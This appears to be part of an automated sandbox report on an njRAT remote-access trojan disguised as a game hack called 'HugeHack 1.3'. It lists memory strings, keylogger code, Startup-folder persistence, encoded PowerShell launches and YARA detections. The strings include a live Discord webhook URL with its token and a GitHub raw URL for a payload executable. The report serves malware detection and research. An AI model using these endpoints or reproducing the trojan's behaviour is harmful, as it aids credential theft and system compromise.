Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimitE
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-strippingc
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-strippingrm
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: powershell.exe, 00000008.00000002.1903364315.0000000004819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1903364315.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005427000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/d
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqB
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/???
Source: webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Payload.exe.0.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: dllhost.exe.2.dr, kl.cs .Net Code: VKCodeToUnicode
Source: ClickMe.exe.2.dr, kl.cs .Net Code: VKCodeToUnicode
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, kl.cs .Net Code: VKCodeToUnicode
Source: c382eb151c59bd833b24120723eac541.exe.16.dr, kl.cs .Net Code: VKCodeToUnicode

E-Banking Fraud

Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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 Jump to behavior
Source: Yara match File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: 01 00 00 00

System Summary

Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
